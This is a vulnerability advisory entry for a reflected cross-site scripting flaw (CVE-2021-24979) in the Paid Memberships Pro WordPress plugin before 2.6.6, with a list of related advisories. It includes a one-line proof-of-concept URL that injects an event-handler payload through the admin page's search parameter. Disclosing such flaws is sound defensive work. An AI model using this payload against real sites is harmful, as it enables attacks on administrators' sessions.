Lucene search
JrXnmWPVDB-ID:FC011990-4EC1-4553-901D-4FF1F482CB79HistoryNov 23, 2021 - 12:00 a.m.
Paid Memberships Pro < 2.6.6 - Reflected Cross-Site Scripting
2021-11-2300:00:00
JrXnm
wpscan.com
4
paid memberships pro
reflected cross-site scripting
attribute escaping
admin page
poc
software
EPSS
0.001
Percentile
45.2%
The plugin does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting
PoC
https://example.com/wp-admin/admin.php?page=pmpro-discountcodes&s;=s"+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Related
patchstack
patchstack
prion
prion
Cross site scripting
2021-12-27 11:15:00
openvas
openvas
WordPress Paid Memberships Pro Plugin < 2.6.6 XSS Vulnerability
2022-02-22 00:00:00
nuclei
nuclei
Paid Memberships Pro < 2.6.6 - Cross-Site Scripting
2023-10-17 07:20:28
cvelist
cvelist
CVE-2021-24979 Paid Memberships Pro < 2.6.6 - Reflected Cross-Site Scripting
2021-12-27 10:33:22
cve
cve
CVE-2021-24979
2021-12-27 11:15:09
nvd
nvd
CVE-2021-24979
2021-12-27 11:15:09
osv
osv
CVE-2021-24979
2021-12-27 11:15:09
cnvd
cnvd
WordPress Paid Memberships Pro plugin cross-site scripting vulnerability
2021-12-28 00:00:00
wpexploit
wpexploit
Paid Memberships Pro < 2.6.6 - Reflected Cross-Site Scripting
2021-11-23 00:00:00